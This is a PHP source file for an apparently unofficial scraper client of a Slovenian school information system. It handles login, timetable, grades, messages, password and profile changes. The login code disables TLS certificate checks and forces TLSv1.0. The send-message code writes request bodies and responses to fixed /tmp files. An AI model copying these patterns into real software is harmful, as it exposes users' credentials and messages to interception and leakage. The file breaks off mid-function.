<?php
function build_data_files($boundary, $fields, $files){
$data = '';
$eol = "\r\n";
$delimiter = '-------------' . $boundary;
foreach ($fields as $name => $content) {
$data .= "--" . $delimiter . $eol
. 'Content-Disposition: form-data; name="' . $name . "\"".$eol.$eol
. $content . $eol;
}
foreach ($files as $name => $content) {
$data .= "--" . $delimiter . $eol
. 'Content-Disposition: form-data; name="undefined"; filename="' . $name . '"' . $eol
. 'Content-Type: '.$content[1].$eol
;
$data .= $eol;
$data .= $content[0] . $eol;
}
$data .= "--" . $delimiter . "--".$eol;
return $data;
}
function strip_tags_content($text, $tags = '', $invert = FALSE) {
preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($tags), $tags);
$tags = array_unique($tags[1]);
if(is_array($tags) AND count($tags) > 0) {
if($invert == FALSE) {
return preg_replace('@<(?!(?:'. implode('|', $tags) .')\b)(\w+)\b.*?>.*?</\1>@si', '', $text);
}
else {
return preg_replace('@<('. implode('|', $tags) .')\b.*?>.*?</\1>@si', '', $text);
}
}
elseif($invert == FALSE) {
return preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);
}
return $text;
}
function DOMinnerHTML(DOMNode $element) {
$innerHTML = "";
$children = $element->childNodes;
foreach ($children as $child) {
$innerHTML .= $element->ownerDocument->saveHTML($child);
}
return $innerHTML;
}
function endsWith($haystack, $needle) {
$length = strlen($needle);
if ($length == 0) {
return true;
}
return (substr($haystack, -$length) === $needle);
}
function startsWith ($string, $startString) {
$len = strlen($startString);
return (substr($string, 0, $len) === $startString);
}
function get_string_between($string, $start, $end){
$string = ' ' . $string;
$ini = strpos($string, $start);
if ($ini == 0) return '';
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
/*
Errors:
-1 no login info
-2 not logged in
-3 bad password but user exists
-4 not written yet
-5 unable to create cookie dir
-6 non existing user
*/
class gimsisextClient {
private $username;
private $adminusername = "anton.sijanec";
private $password;
public $version = array(0, 10, 2);
private $programname = "gimsisextclient";
private $programdomain = 'gimsisextclient.gimb.tk';
private $cookiedir; // set at runtime, ker je get_curerent_user, v login()
private $mailbox = "/home/gimb/Mailbox";
private $gimsisextlogin = "https://zgimsis.gimb.org/Logon.aspx";
private $gimsisexturnik = "https://zgimsis.gimb.org/Page_Gim/Ucenec/DnevnikUcenec.aspx";
private $gimsisextocenjevanja = "https://zgimsis.gimb.org/Page_Gim/Ucenec/IzpitiUcenec.aspx";
private $gimsisextocene = "https://zgimsis.gimb.org/Page_Gim/Ucenec/OceneUcenec.aspx";
private $gimsisextprofesorji = "https://zgimsis.gimb.org/Page_Gim/Ucenec/UciteljskiZbor.aspx";
private $gimsisextprofil = "https://zgimsis.gimb.org/Page_Gim/Uporabnik/Profil.aspx";
private $gimsisextshraniprofil = "https://zgimsis.gimb.org/WS_Gim/wsGimSisUtils.asmx/ShraniUporabnikPodatki";
private $gimsisextabout = "https://zgimsis.gimb.org/About.aspx";
private $gimsisextdefault = "https://zgimsis.gimb.org/Default.aspx";
private $gimsisextsporocila = "https://zgimsis.gimb.org/Page_Gim/Uporabnik/Sporocila.aspx";
private $gimsisextposljisporocilo = "https://zgimsis.gimb.org/Page_Gim/Uporabnik/modSporocilo.aspx?params=";
private $gimsisextsetgeslo = "https://zgimsis.gimb.org/WS_Gim/wsGimSisUtils.asmx/ShraniUporabnikGeslo";
private $gimsisextizbrisisporocilo = "https://zgimsis.gimb.org/Page_Gim/Uporabnik/Sporocila.aspx/DeleteMessage";
private $gimsisextizostanki = "https://zgimsis.gimb.org/Page_Gim/Ucenec/IzostankiUcenec.aspx";
private $gimsisextresetgeslo = "https://zgimsis.gimb.org/ResetPassword.aspx";
private $gimsisextmodsporocilo = "https://zgimsis.gimb.org/Page_Gim/Uporabnik/modSporocilo.aspx";
public function setusername($value) {
$this->username = $value;
}
public function setpassword($value) {
$this->password = $value;
}
private function get($property) {
return $this->$property;
}
public function getversion() {
return $this->version;
}
private function login() {
if (empty($this->username) || empty($this->password)) {
return -1;
}
$this->cookiedir = '/tmp/'.posix_getuid().'/'.$this->programdomain.'/cookiedir/';
if (!is_dir($this->cookiedir.$this->username)) {
if (!mkdir($this->cookiedir.$this->username, 0700, true)) { // x permišn mora bit', da lahko dela poddirektorije, hence true, hence 0700; group in others pa je 0, da ne morejo brati piškotkov!!! zeloo pomembno!
return -5;
}
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_0);
curl_setopt($ch, CURLOPT_COOKIESESSION, true );
curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookiedir.$this->username."/cookie.txt" ); // cookiejar
curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookiedir.$this->username."/cookie.txt" ); // coolie file // this scuks
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
// curl_setopt($ch, CURLOPT_HEADER, 1); // return headers?
curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return transfer?
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // follow 3xx redirects?
curl_setopt($ch, CURLOPT_MAXREDIRS, 10); // max 3xx redirectas?
curl_setopt($ch, CURLOPT_USERAGENT, $this->programdomain."/".implode(".", $this->version));
curl_setopt($ch, CURLOPT_AUTOREFERER, 1); // auto send refereres?
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); // timeout for tcp connection
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // timeout for http response
curl_setopt($ch, CURLOPT_URL, $this->gimsisextlogin);
curl_setopt($ch, CURLOPT_POST, 0);
$login_page = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $login_page );
$searchNode = $xmlDoc->getElementsByTagName( "input" );
foreach( $searchNode as $sn ) {
if($sn->getAttribute('name') != "edtGSEUserPassword" && $sn->getAttribute('name') != "edtGSEUserId")
$postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value'))."&";
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisextlogin);
curl_setopt($ch, CURLOPT_POST, 1);
$postbody = $postvars."edtGSEUserId=".$this->username."&edtGSEUserPassword=".$this->password;
curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody);
$login_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $login_output );
$searchNode = $xmlDoc->getElementsByTagName( "span" );
foreach( $searchNode as $sn ) {
if($sn->getAttribute('id') == "lblMsg") {
if (DOMinnerHTML($sn) == "Napačno uporabniško ime ali geslo!") {
return -3;
}
if (startsWith(DOMinnerHTML($sn), "Uporabnik je začasno zaklenjen")) {
return array(-5, end(explode(" ", DOMinnerHTML($sn))));
}
if (endsWith(DOMinnerHTML($sn), "ni prijavni podatki. Prijava ni uspela.")) {
return -6;
}
}
}
return $ch;
}
public function fetchurnik($date = null) { // date ponedeljka v formatu 22.10.2019
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisexturnik);
curl_setopt($ch, CURLOPT_POST, 0);
$urnik_init_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $urnik_init_output );
$searchNode = $xmlDoc->getElementsByTagName( "input" );
foreach( $searchNode as $sn ) {
if($sn->getAttribute('name') != 'ctl00$ContentPlaceHolder1$wkgDnevnik_edtGridSelectDate') {
$postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value'))."&";
} else {
if(empty($date)) {
$date = $sn->getAttribute('value');
}
}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisexturnik);
curl_setopt($ch, CURLOPT_POST, 1);
$postbody = $postvars . urlencode('ctl00$ContentPlaceHolder1$wkgDnevnik_edtGridSelectDate') . '=' . $date;
curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody);
$urnik_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $urnik_output );
$searchNode = $xmlDoc->getElementsByTagName( "span" );
foreach( $searchNode as $sn ) {
if(startsWith($sn->getAttribute("id"), "ctl00_ContentPlaceHolder1_wkgDnevnik_btnCell_")) {
$krneki = explode("_", $sn->getAttribute("id"));
$ura = $krneki[4];
$dan = $krneki[5];
$desc = str_replace("\r", null, $sn->getAttribute("title"));
$desc = explode("\n", $desc);
$predmet = get_string_between($desc[1], "(", ")"); // 0 je prazen string!!1
$kratica = explode(" (", $desc[1])[0];
$razred = $desc[2];
$profa = $desc[3];
$mesto = $desc[4];
$urnik[intval($dan)][intval($ura)] = array(
"predmet" => $predmet,
"kratica" => $kratica,
"razred" => $razred,
"profesor" => $profa,
"prostor" => $mesto
);
}
}
return $urnik;
}
public function fetchocenjevanja() {
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisextocenjevanja);
curl_setopt($ch, CURLOPT_POST, 0);
$ocenjevanja_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $ocenjevanja_output );
$tabelaNode = $xmlDoc->getElementsByTagName( "table" );
$tbodyNode = $tabelaNode[0]->getElementsByTagName( "tbody" );
$rowNodes = $tbodyNode[0]->getElementsByTagName("tr");
$ocenjevanja = array();
foreach ($rowNodes as $rn) {
$tdnode = $rn->getElementsByTagName("td");
$datum = DOMinnerHTML($tdnode[0]);
$tdspannode = $tdnode[1]->getElementsByTagName("span");
if ($tdspannode != null) $kratica = DOMinnerHTML($tdspannode[0]);
$predmet = explode(" (", strip_tags_content(DOMinnerHTML($tdnode[1])))[0];
$opis = get_string_between(strip_tags_content(DOMinnerHTML($tdnode[1])), "(", ")");
$ocenjevanja[] = array(
"datum" => str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $datum))),
"kratica" => str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $kratica))),
"predmet" => substr(str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $predmet))), 0, -2),
"opis" => str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $opis)))
);
}
return $ocenjevanja;
}
public function fetchprofesorji() {
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisextprofesorji);
curl_setopt($ch, CURLOPT_POST, 0);
$profesorji_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $profesorji_output );
$tabelaNode = $xmlDoc->getElementsByTagName( "table" );
$tbodyNode = $tabelaNode[0]->getElementsByTagName( "tbody" );
$rowNodes = $tbodyNode[0]->getElementsByTagName("tr");
$profesorji = array();
foreach ($rowNodes as $rn) {
$tdnode = $rn->getElementsByTagName("td");
$ime = strip_tags(DOMinnerHTML($tdnode[0]));
$predmetistrings = explode("<br />", DOMinnerHTML($tdnode[2]));
$predmeti = array();
foreach ($predmetistrings as $predmet) {
$predmetime = strip_tags(get_string_between(strip_tags($predmet), "(", ")"));
$predmetkratica = strip_tags(explode(" (", strip_tags($predmet))[0]);
if(empty($predmetime)) { $predmetime = $predmetkratica; $predmetkratica = null; }
if(empty($predmetkratica)) $predmetkratica = substr($predmetime, 0, 3);
$predmeti[] = array( "ime" => $predmetime, "kratica" => $predmetkratica);
}
$govorilneurestring = DOMinnerHTML($tdnode[3]);
$dan = explode(", ", $govorilneurestring)[0];
if($dan == "ponedeljek") {
$govorilneuredan = 0;
} elseif ($dan == "torek") {
$govorilneuredan = 1;
} elseif ($dan == "sreda") {
$govorilneuredan = 2;
} elseif (endsWith($dan, "etrtek")) { // because č can be tricky
$govorilneuredan = 3;
} elseif ($dan == "petek") {
$govorilneuredan = 4;
}
$solskaura = intval(get_string_between($govorilneurestring, ", ", ". ura"));
$uraod = explode(" - ", get_string_between($govorilneurestring, "(", ")"))[0];
$urado = explode(" - ", get_string_between($govorilneurestring, "(", ")"))[0];
$profesorji[] = array(
"ime" => $ime,
"predmeti" => $predmeti,
"govorilneure" => array("dan" => $govorilneuredan, "solskaura" => $solskaura, "uraod" => $uraod, "urado" => $urado)
);
}
return $profesorji;
}
public function fetchprofil() {
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisextprofil);
curl_setopt($ch, CURLOPT_POST, 0);
$profil_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $profil_output );
$spanNodes = $xmlDoc->getElementsByTagName( "span" );
$inputNodes = $xmlDoc->getElementsByTagName( "input" );
foreach ($spanNodes as $sn) {
switch($sn->getAttribute("id")) {
case "ctl00_ContentPlaceHolder1_lblVrstaUporabnik":
$vrsta = DOMinnerHTML($sn);
break;
case "ctl00_ContentPlaceHolder1_lblIme":
$ime = DOMinnerHTML($sn);
break;
case "ctl00_ContentPlaceHolder1_lblPriimek":
$priimek = DOMinnerHTML($sn);
break;
case "ctl00_ContentPlaceHolder1_lblSpol":
$spol = DOMinnerHTML($sn);
break;
case "ctl00_ContentPlaceHolder1_lblEPosta":
$eposta = DOMinnerHTML($sn);
break;
case "ctl00_ContentPlaceHolder1_lblTelefon":
$telefon = DOMinnerHTML($sn);
break;
}
}
foreach ($inputNodes as $in) {
switch($in->getAttribute("id")) {
case "ctl00_ContentPlaceHolder1_chbEPosta":
$checked = $in->getAttribute("checked");
break;
}
}
$obvestila = 0;
if($checked == "checked") $obvestila = 1;
return array("ime" => $ime, "priimek" => $priimek, "spol" => $spol, "vrsta" => $vrsta, "eposta" => $eposta, "obvestila" => $obvestila, "telefon" => $telefon);
}
public function setprofil($ime, $priimek, $spol, $eposta, $obvestila, $telefon) { // spol: "M"/"Ž" obvestila:"true"/"false" telefon: +tccpndddddd (npr. +38664176345)
// PATCH! od verzije 1.0.7226.34224 dalje je blokirano spreminjanje osebnih podatkov dijakom
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
$podatki = 'IdUporabnik='.$this->username.'|edtIme='.$ime.'|edtPriimek='.$priimek.'|edtSpol='.$spol.'|edtEPosta='.$eposta.'|edtIndObvEPosta='.$obvestila.'|edtTelefon='.$telefon.'|edtIndObvSMS=undefined|';
curl_setopt($ch, CURLOPT_URL, $this->gimsisextshraniprofil);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
'X-Requested-With: XMLHttpRequest',
'Referer: https://zgimsis.gimb.org/Page_Gim/Uporabnik/modVnosPodatki.aspx?params='.base64_encode("Id=".$this->username."|Type=")
));
$postbody = '{ "aPodatki": "'.base64_encode($podatki).'" }';
curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody);
$setprofil_output = curl_exec($ch);
if(json_decode($setprofil_output, true)['d']['success'] == true) {
return true;
} else {
return false;
}
}
public function fetchabout() {
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisextabout);
curl_setopt($ch, CURLOPT_POST, 0);
$profil_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $profil_output );
$spanNodes = $xmlDoc->getElementsByTagName( "span" );
foreach ($spanNodes as $sn) {
switch($sn->getAttribute("id")) {
case "ctl00_ContentPlaceHolder1_lblCopyright":
$copyright = html_entity_decode(DOMinnerHTML($sn));
break;
case "ctl00_ContentPlaceHolder1_lblTitle":
$ime = html_entity_decode(DOMinnerHTML($sn));
break;
case "ctl00_ContentPlaceHolder1_lblDescription":
$opis = html_entity_decode(DOMinnerHTML($sn));
break;
case "ctl00_ContentPlaceHolder1_lblVersion":
$ver = html_entity_decode(DOMinnerHTML($sn));
break;
case "ctl00_ContentPlaceHolder1_lblCompany":
$podjetje = html_entity_decode(DOMinnerHTML($sn));
break;
case "ctl00_ContentPlaceHolder1_lblConfiguration":
$konfiguracija = html_entity_decode(DOMinnerHTML($sn));
break;
}
}
return array("ime" => $ime, "opis" => $opis, "ver" => $ver, "copyright" => $copyright, "podjetje" => $podjetje, "konfiguracija" => $konfiguracija);
}
public function fetchneprebrana() {
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisextdefault);
curl_setopt($ch, CURLOPT_POST, 0);
$prebrana_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $prebrana_output );
$spanNodes = $xmlDoc->getElementsByTagName( "span" );
foreach ($spanNodes as $sn) {
switch($sn->getAttribute("class")) {
case "titleRed":
$unread = html_entity_decode(DOMinnerHTML($sn));
break;
}
}
return intval($unread);
}
public function fetchsporocilaseznam($katera = 0) { // katera sporočila? 0=prejeta 1=poslana 2=izbrisana
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisextsporocila);
switch($katera) {
case 0:
$kategorija = "msgReceived";
$slokat = "prejeta";
break;
case 1:
$kategorija = "msgSent";
$slokat = "poslana";
break;
case 2:
$kategorija = "msgDeleted";
$slokat = "izbrisana";
break;
}
curl_setopt($ch, CURLOPT_POST, 0);
$sporocilaseznam_init_output = curl_exec($ch);
$xmlDoc = new DOMDocument($sporocilaseznam_init_output);
$xmlDoc->loadHTML( $sporocilaseznam_init_output );
$searchNode = $xmlDoc->getElementsByTagName( "input" );
foreach( $searchNode as $sn ) {
if($sn->getAttribute('name') != 'ctl00$ContentPlaceHolder1$ddlPrikaz' && $sn->getAttribute('name') != '__EVENTARGUMENT') {
$postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value'))."&";
}
}
curl_setopt($ch, CURLOPT_POST, 1);
$msgkat = array();
$zadnjastran = 1;
for ($stran = 1; $stran <= $zadnjastran; $stran++) {
$postbody = $postvars . urlencode('ctl00$ContentPlaceHolder1$ddlPrikaz') . '=' . $kategorija . '&' . '__EVENTARGUMENT=Page%24' . $stran . '&' .
'__EVENTTARGET=ctl00%24ContentPlaceHolder1%24gvwSporocila';
curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody);
$sporocilaseznam_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $sporocilaseznam_output );
if ($stran == 1) {
foreach ($xmlDoc->getElementsByTagName("tr") as $rn) {
if ($rn->getAttribute("class") == "pager") {
;
$zadnjastran = sizeof($rn->getElementsByTagName("td")[0]->getElementsByTagName("table")[0]->getElementsByTagName("tr")[0]->getElementsByTagName("td"));
}
}
if ($zadnjastran < 1) {
$zadnjastran = 1;
}
}
$tabelaNode = $xmlDoc->getElementsByTagName( "table" );
foreach($tabelaNode as $tn) {
if ($tn->getAttribute("id") == "ctl00_ContentPlaceHolder1_gvwSporocila") {
$msg = array();
foreach ($tn->getElementsByTagName("tbody")[0]->getElementsByTagName("td") as $dn) {
foreach($dn->getElementsByTagName('span') as $sn) {
$kles = $sn->getAttribute("class");
if ( $kles == "msgSubDate") {
$datum = null;
$dan = null;
$mesec = null;
$leto = null;
$datetime = DOMinnerHTML($sn);
$datum = explode(" ", $datetime)[0];
$ura = explode(" ", $datetime)[1];
if (empty($ura)) {
$ura = $datum;
$datum = date("d.m.Y");
}
$dan = intval(explode(".", $datum)[0]);
$mesec = intval(explode(".", $datum)[1]);
$leto = intval(explode(".", $datum)[2]);
if (empty($leto)) {
$leto = intval(date("Y"));
}
$msg['datum'] = array( "dan" => $dan, "mesec" => $mesec, "leto" => $leto );
$msg['cas'] = array("ura" => intval(explode(":", $ura)[0]), "minuta" => intval(explode(":", $ura)[1]));
} elseif ( $kles == "msgDir") {
$msg['posiljatelj'] = DOMinnerHTML($sn);
} elseif (startsWith($kles, "msgSubject")) {
$msg['zadeva'] = DOMinnerHTML($sn);
}
}
$msg['id'] = $dn->getElementsByTagName("input")[0]->getAttribute("value");
$msg['prebrano'] = boolval(explode("|", $msg['id'])[2]);
$msgkat[] = $msg;
}
}
}
}
return $msgkat;
}
public function fetchsporocilo($id) { // id formata ddddd|ddddd|d ali samo 1. sklop
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisextmodsporocilo."?params=IdMsg%3D".explode("|", $id)[0]);
curl_setopt($ch, CURLOPT_POST, 0);
$sporocilo_output = curl_exec($ch);
$zadeva = html_entity_decode(get_string_between($sporocilo_output, '<input name="ctl00$ModalMasterBody$edtZadeva" type="text" value="', '" id="ctl00_ModalMasterBody_edtZadeva" />'));
$telo = str_replace("'", "'", html_entity_decode(html_entity_decode(get_string_between($sporocilo_output, "</span></p>", "</textarea>"))));
$posiljatelj = html_entity_decode(html_entity_decode(get_string_between($sporocilo_output, "><b>Od</b>: ", "<br /><b>Poslano</b>: "))); // ne trudi se za prejemnika, gimsisglitch(C)12
$datumincas = get_string_between($sporocilo_output, "<br /><b>Poslano</b>: ", "<br /><b>Za</b>: "); // pazi, tale je za ljudi
$cas = explode(":", end(explode(" ", $datumincas)));
$datum['dan'] = intval(substr(explode(" ", $datumincas)[0], 0, -1)); // da ni .
$datum['mesecbeseda'] = explode(" ", $datumincas)[1];
$datum['leto'] = explode(" ", $datumincas)[2];
switch ($datum['mesecbeseda']) {
case "jan":
$datum['jsmesec'] = 0;
break;
case "feb":
$datum['jsmesec'] = 1;
break;
case "mar":
$datum['jsmesec'] = 2;
break;
case "apr":
$datum['jsmesec'] = 3;
break;
case "maj":
$datum['jsmesec'] = 4;
break;
case "jun":
$datum['jsmesec'] = 5;
break;
case "jul":
$datum['jsmesec'] = 6;
break;
case "avg":
$datum['jsmesec'] = 7;
break;
case "sep":
$datum['jsmesec'] = 8;
break;
case "okt":
$datum['jsmesec'] = 9;
break;
case "nov":
$datum['jsmesec'] = 10;
break;
case "dec":
$datum['jsmesec'] = 11;
break;
case "šubidubi":
$datum['jsmesec'] = 69; // yey, another easteregg!
break;
}
$datum['mesec'] = $datum['jsmesec']+1;
$msg = array("telo" => $telo, "zadeva" => $zadeva, "posiljatelj" => $posiljatelj, "datumincas" => array("opis" => $datumincas, "cas" => array("ura" => $cas[0], "minuta" => $cas[1]), "datum" => $datum));
return $msg;
}
public function posljisporocilo($prejemnikst, $zadeva, $telo) { // prejemnikst je zajeban dobit (za zdej)
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $this->gimsisextposljisporocilo);
$posljisporocilo_init_output = curl_exec($ch);
$xmlDoc = new DOMDocument($posljisporocilo_init_output);
$xmlDoc->loadHTML( $posljisporocilo_init_output );
$searchNode = $xmlDoc->getElementsByTagName( "input" );
foreach( $searchNode as $sn ) {
if($sn->getAttribute("name") != 'ctl00$ModalMasterBody$edtPrejemniki' && $sn->getAttribute("name") != 'ctl00$ModalMasterBody$edtZadeva' && $sn->getAttribute("name") != 'ctl00$ModalMasterBody$edtBesediloExt' && $sn->getAttribute("name") != 'ctl00$ModalMasterBody$hfPrejemniki') {
$postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value')).'&';
}
}
curl_setopt($ch, CURLOPT_POST, 1);
// curl_setopt($ch, CURLOPT_HEADER, array('array("Content-Type: multipart/form-data")'));
curl_setopt($ch, CURLOPT_URL, $this->gimsisextposljisporocilo);
$postbody=$postvars.'&'.urlencode('ctl00$ModalMasterBody$edtZadeva').'='.urlencode($zadeva).'&'.urlencode('ctl00$ModalMasterBody$edtBesediloExt').'='.urlencode($telo).'&__EVENTTARGET=ctl00%24ModalMasterBody%24btnDogodekShrani&__EVENTARGUMENT=&'.urlencode('ctl00$ModalMasterBody$hfPrejemniki').'='.urlencode($prejemnikst);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody);
$posljisporocilo_output = curl_exec($ch);
return;
}
public function posljisporocilonov($prejemnikst, $zadeva, $telo, $file = null, $filemime = null, $filename = null) { // prejemnikst je zajeban dobit (za zdej)
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $this->gimsisextposljisporocilo);
$posljisporocilo_init_output = curl_exec($ch);
$xmlDoc = new DOMDocument($posljisporocilo_init_output);
$xmlDoc->loadHTML( $posljisporocilo_init_output );
$searchNode = $xmlDoc->getElementsByTagName( "input" );
$postfields = array();
foreach( $searchNode as $sn ) {
if($sn->getAttribute("name") == 'ctl00$ModalMasterBody$edtPrejemniki') {
} else if($sn->getAttribute("name") == 'ctl00$ModalMasterBody$edtZadeva') {
} else if($sn->getAttribute("name") == 'ctl00$ModalMasterBody$edtBesediloExt'){
} else if ($sn->getAttribute("name") == 'ctl00$ModalMasterBody$hfPrejemniki') {
} else {
$postfields[urlencode($sn->getAttribute("name"))] = urlencode($sn->getAttribute('value'));
}
}
$postfields['ctl00$ModalMasterBody$edtBesediloExt'] = $telo;
$postfields['ctl00$ModalMasterBody$hfPrejemniki'] = $prejemnikst;
$postfields['ctl00$ModalMasterBody$edtZadeva'] = $zadeva;
$postfields['ctl00$ModalMasterBody$edtPrejemniki'] = "";
if(!empty($file) && !empty($filemime) && !empty($filename)) {
$files = array($filename => array($file, $filemime));
} else {
$files = array();
}
$postfields["__EVENTTARGET"] = "ctl00%24ModalMasterBody%24btnDogodekShrani";
$postfields["__EVENTARGUMENT"] = "";
$boundary = time();
$delimiter = '-------------' . $boundary;
$post_data = build_data_files($boundary, $postfields, $files);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, array(
"Content-Type: multipart/form-data; boundary=".$delimiter
));
curl_setopt($ch, CURLOPT_URL, $this->gimsisextposljisporocilo);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$posljisporocilo_output = curl_exec($ch);
file_put_contents("/tmp/12.html", $posljisporocilo_output);
file_put_contents("/tmp/12.txt", $post_data);
return;
}
public function setgeslo($geslo, $spremenigeslovobjektu = true) { // geslo
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
$podatki = 'IdUporabnik='.$this->username.'|edtStaroGeslo='.$this->password.'|edtGeslo='.$geslo.'|edtGeslo2='.$geslo.'|';
curl_setopt($ch, CURLOPT_URL, $this->gimsisextsetgeslo);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
'X-Requested-With: XMLHttpRequest',
'Referer: '.$this->gimsisextsetgeslo.'?params='.base64_encode("Id=".$this->username."|Type=")));
$postbody = '{ "aPodatki": "'.base64_encode($podatki).'" }';
curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody);
$setgeslo_output = curl_exec($ch);
if(json_decode($setgeslo_output, true)['d']['success'] == true) {
if($spremenigeslovobjektu) {
$this->password = $geslo;
}
return true;
} else {
return false;
}
}
public function izbrisisporocilo($id) {
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisextizbrisisporocilo);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
'X-Requested-With: XMLHttpRequest',
'Referer: '.$this->gimsisextsporocila));
$postbody = '{"aIdSporocilo":'.explode("|", $id)[0].',"aIdZapis":'.explode("|", $id)[1].'}';
curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody);
$izbrisisporocilo_output = curl_exec($ch);
if(json_decode($izbrisisporocilo_output, true)['d'] == true) {
return true;
} else {
return false;
}
}
public function fetchizostanki($datzacetka = "01.01.0001", $datkonca = "31.12.9999") { // ali pa arraya(dan, mesec, leto)
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
$datkategorije = array("datzacetka", "datkonca");
foreach($datkategorije as $datkat) {
if ( is_array($$datkat) ) {
$$datkat = implode(".", $$datkat);
}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisextizostanki);
curl_setopt($ch, CURLOPT_POST, 0);
$izostanki_init_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $izostanki_init_output );
$searchNode = $xmlDoc->getElementsByTagName( "input" );
foreach( $searchNode as $sn ) {
if($sn->getAttribute('name') != 'ctl00$ContentPlaceHolder1$edtDatZacetka' && $sn->getAttribute('name') != 'ctl00$ContentPlaceHolder1$edtDatKonca') {
$postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value'))."&";
} else {
if(empty($date)) {
$date = $sn->getAttribute('value');
}
}
}
curl_setopt($ch, CURLOPT_POST, 1);
$postbody = $postvars . urlencode('ctl00$ContentPlaceHolder1$edtDatZacetka') . '=' . urlencode($datzacetka) . '&' . urlencode('ctl00$ContentPlaceHolder1$edtDatKonca') . '=' . urlencode($datkonca);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody);
$izostanki_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $izostanki_output );
$searchNode = $xmlDoc->getElementsByTagName( "table" );
foreach( $searchNode as $sn ) {
